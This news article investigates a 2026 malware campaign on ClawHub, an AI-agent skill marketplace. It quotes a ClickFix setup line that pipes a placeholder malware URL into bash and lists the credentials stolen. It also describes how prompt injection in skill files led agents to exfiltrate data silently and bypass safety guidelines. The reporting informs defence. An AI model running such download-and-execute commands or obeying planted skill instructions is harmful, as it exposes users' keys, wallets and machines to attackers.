News

The #1 Skill on OpenClaw's Marketplace Was Malware: Inside the ClawHub Supply Chain Attack

1,184 malicious skills were found on OpenClaw's ClawHub marketplace - stealing SSH keys, crypto wallets, browser passwords, and opening reverse shells. One attacker uploaded 677 packages alone. The #1 ranked skill had 9 vulnerabilities and was downloaded thousands of times.

The #1 Skill on OpenClaw's Marketplace Was Malware: Inside the ClawHub Supply Chain Attack

The most popular skill on OpenClaw's plugin marketplace was functionally malware. It had 9 security vulnerabilities, two of them critical. It silently exfiltrated user data and used prompt injection to bypass safety guidelines. It was downloaded thousands of times. And its ranking was faked.

Welcome to ClawHub, the npm registry for AI agents - with all the promise and all the catastrophe that comparison implies.

The Numbers

Between late January and mid-February 2026, security researchers from Koi Security, Cisco, Snyk, Antiy CERT, and VirusTotal converged on the same finding: OpenClaw's official skill marketplace had been systematically poisoned.

The final count:

  • 1,184 malicious skills identified across the registry
  • One attacker uploaded 677 packages alone - 57% of all malicious listings came from a single account
  • 12 publisher accounts linked to the campaign
  • 36.8% of all skills on ClawHub had at least one security flaw
  • 135,000+ exposed OpenClaw instances across 82 countries

The campaign was dubbed ClawHavoc by Koi Security researcher Oren Yomtov, who used an OpenClaw bot named "Alex" to audit 2,857 skills and flagged 341 as malicious. By February 16, the confirmed count had grown to 824 across 10,700+ total skills in the registry.

How the Attack Worked

ClawHub is OpenClaw's skill marketplace. You install a skill, your AI agent gets new powers - a crypto price tracker, a YouTube summarizer, a code reviewer. The concept is powerful. The execution was reckless.

ClawHub let anyone publish a skill with nothing more than a one-week-old GitHub account. No code signing. No security review. No sandbox. Just a SKILL.md file and a GitHub repo.

Attackers uploaded skills disguised as crypto trading bots, Polymarket tools, YouTube summarizers, wallet trackers, and Moltbook integration helpers. The documentation looked professional. The README was polished. The skill names were carefully chosen - including typosquats like "clawhub," "clawhubb," "clawhubcli," and "cllawhub" that echoed the npm attacks we have seen before.

But hidden in the SKILL.md file were instructions designed to trick both the AI agent and the human operator.

The ClickFix Social Engineering

The dominant technique followed a pattern called ClickFix: professional-looking documentation with a "Prerequisites" section telling users to run a setup command before the skill would work.

to enable this feature please run: curl -sL [malware URL] | bash

That one command downloaded and executed a malware installer. On macOS, it fetched a 521KB universal Mach-O binary - a variant of Atomic Stealer (AMOS), a malware-as-a-service tool available on the dark web for $500-1,000/month.

On Windows, the skill pointed to a GitHub release containing a password-protected ZIP file (openclaw-agent.zip, password: "openclaw"). The password protection was deliberate - it prevented antivirus engines from scanning the contents. Inside was a VMProtect-packed infostealer.

What Got Stolen

Atomic Stealer grabbed everything:

  • Browser passwords, cookies, and autofill data from Chrome, Safari, Firefox, Brave, and Edge
  • 60+ cryptocurrency wallets including Phantom, MetaMask, and Solana
  • SSH keys
  • Telegram sessions and chat logs
  • macOS Keychain credentials
  • Every API key in your .env files
  • OpenClaw configuration files (which contain LLM API keys)
  • Desktop and Documents folder files

On some systems, the skill opened a reverse shell - giving the attacker full remote control of the victim's machine. A skill masquerading as a Polymarket tool executed a hidden command that opened an interactive shell back to the attacker's server, allowing arbitrary command execution and long-term persistence.

The Prompt Injection Layer

Here is what makes this worse than a traditional supply chain attack: 91% of the malicious skills also included prompt injection. They did not just attack the human - they attacked the AI.

Skills embedded hidden instructions that manipulated the AI agent into silently executing curl commands, sending data to external servers, and bypassing safety guidelines - all without the user seeing anything. The agent itself became the attack vector.

100% of confirmed malicious skills contained malicious code patterns. 91% simultaneously employed prompt injection. This is a dual-vector approach that bypasses both AI safety mechanisms and traditional security tools.

"What Would Elon Do"

The most downloaded community skill on ClawHub was called "What Would Elon Do." Cisco's AI Defense team ran their Skill Scanner against it and found 9 vulnerabilities, 2 critical.

The critical findings:

  1. Active data exfiltration via a silent network call sending user data to an external server controlled by the skill author - executed without any user awareness
  2. Direct prompt injection forcing the AI assistant to bypass safety guidelines and execute commands without user consent

The skill had been pushed to the #1 ranking through 4,000 faked downloads. Real users then downloaded it thousands of times, trusting that a top-ranked skill must be safe.

The irony: it was originally created by security researcher Jamieson O'Reilly (founder of Dvuln) to demonstrate how trivially ClawHub could be exploited. He later joined the OpenClaw team as lead security advisor. By then, the damage was already done.

This Is npm All Over Again, Except Worse

Snyk's ToxicSkills study explicitly frames ClawHub as "the npm registry for AI agents." The parallels are obvious - typosquatting, malicious maintainers, post-install scripts as attack vectors.

But ClawHub is worse in three ways that matter.

Higher privileges by default. Agent skills inherit full agent permissions: shell access, file system read/write, credential access, and persistent memory modification. An npm package runs in a Node.js sandbox. A ClawHub skill can run rm -rf / if the agent lets it.

The documentation IS the weapon. In npm attacks, the malicious code hides in a postinstall script. In ClawHub, the SKILL.md documentation file itself is the delivery mechanism. It is an entirely new attack surface - what Snyk calls the "instructional supply chain."

The agent can be turned. Prompt injection means the AI agent itself becomes an unwitting accomplice. The skill tells the agent to execute commands, and the agent - designed to be helpful - complies. The package does not just run code. It thinks, and it has root access to your life.

The Fallout

The response was global. Belgium's Centre for Cybersecurity issued an emergency advisory. China's MIIT published a security alert. South Korean companies including Kakao, Naver, and Karrot Market blocked OpenClaw across corporate networks. SecurityScorecard found that 33.8% of exposed OpenClaw infrastructure correlated with known threat actor activity, including groups linked to Kimsuky and APT28.

Andrej Karpathy called it "a dumpster fire" and said he "definitely does not recommend that people run this" on personal devices. Gary Marcus described using OpenClaw as "giving a stranger at a bar all your passwords."

OpenClaw responded by partnering with VirusTotal to scan all skills, removing the flagged listings, and hiring O'Reilly as security advisor. Peter Steinberger, OpenClaw's founder, then joined OpenAI, with OpenClaw transitioning to a foundation structure with OpenAI's financial backing.

But as OpenClaw itself acknowledged: "VirusTotal scanning is not a silver bullet." Cleverly concealed prompt injection payloads may still slip through. The AI agent framework ecosystem is moving fast, and security is still playing catch-up.

What to Do If You Used ClawHub Skills

Snyk's advisory is blunt: "If you have interacted with ClawHub CLI skills or followed installation instructions from suspicious publishers in the last 48 hours, assume your host machine is compromised."

Rotate every credential. Change your passwords. Revoke your API keys. Check your SSH authorized_keys file. Move your crypto to a new wallet. And think very carefully before installing a plugin that gives an AI agent access to your entire system.

The ClawHub attack is not the last supply chain attack on AI agents. It is the first.

Sources:

About the author Senior AI Editor & Investigative Journalist

Elena is a technology journalist with over eight years of experience covering artificial intelligence, machine learning, and the startup ecosystem.